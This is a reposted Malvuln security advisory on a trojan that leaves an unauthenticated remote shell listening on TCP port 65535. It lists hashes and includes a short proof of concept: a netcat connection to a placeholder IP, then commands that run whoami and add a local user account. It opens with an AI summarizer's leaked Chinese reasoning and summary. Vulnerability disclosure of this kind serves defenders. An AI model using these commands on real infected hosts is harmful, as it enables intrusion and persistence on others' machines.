Trojan-Spy.Win32.Small / Remote Command Execution
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。首先,我得仔细阅读用户提供的文章内容,找出关键信息。 文章开头提到了威胁是Trojan-Spy.Win32.Small,这是一个恶意软件。然后描述了它的漏洞是远程命令执行,也就是说攻击者可以远程执行系统命令。接着提到它在TCP 65535端口上打开一个监听器,允许未经授权的攻击者执行任意命令。还有MD5和SHA256哈希值,这些是恶意软件的标识符。 用户要求总结控制在100字以内,并且不需要特定的开头,直接描述内容。所以我要把重点放在恶意软件的名字、漏洞类型、攻击方式以及相关技术细节上。 可能的结构是:恶意软件名称、漏洞类型、攻击方式、端口和哈希值。这样既全面又简洁。 现在组织语言:Trojan-Spy.Win32.Small是一种恶意软件,存在远程命令执行漏洞。它通过TCP 65535端口监听,允许攻击者执行任意系统命令。MD5和SHA256分别为8c15ec...和72fd...。 检查字数是否在限制内,并确保信息准确无误。 </think> Trojan-Spy.Win32.Small 是一种恶意软件,存在远程命令执行漏洞。攻击者可通过 TCP 65535 端口在感染主机上执行任意操作系统命令。该恶意软件的 MD5 和 SHA256 哈希值分别为 8c15ec... 和 72fd...。 2026-4-22 21:54:0 Author: cxsecurity.com(查看原文) 阅读量:16 收藏

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2026 Original source: https://malvuln.com/advisory/8c15ec5f0137d097a345b693f0bffedb.txt Malvuln Intelligence Feed: https://intel.malvuln.com/ Contact: [email protected] Media: x.com/malvuln Threat: Trojan-Spy.Win32.Small Vulnerability: Remote Command Execution Description: The malware opens a listener on TCP port 65535, allowing unauthenticated remote attackers with network access to execute arbitrary operating system commands on the infected host. Family: Small Type: PE32 Attack-pattern TTP: Command and Scripting Interpreter (T1059) MD5: 8c15ec5f0137d097a345b693f0bffedb SHA256: 72fde71106a31ada61b6beea14256b8609e18f7f7818a19e06318dee67ab655b Vuln ID: MVID-2026-0705 Disclosure: 04/20/2026 Exploit/PoC: nc64.exe x.x.x.x 65535 Microsoft Windows [Version 10.0.16299.309] (c) 2017 Microsoft Corporation. All rights reserved. C:\Users\victim\Desktop>whoami whoami desktop-2c3iqho\victim calc C:\>net user hubert abc123 /add net user hubert abc123 /add The command completed successfully. exit Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026040016
如有侵权请联系:admin#unsafe.sh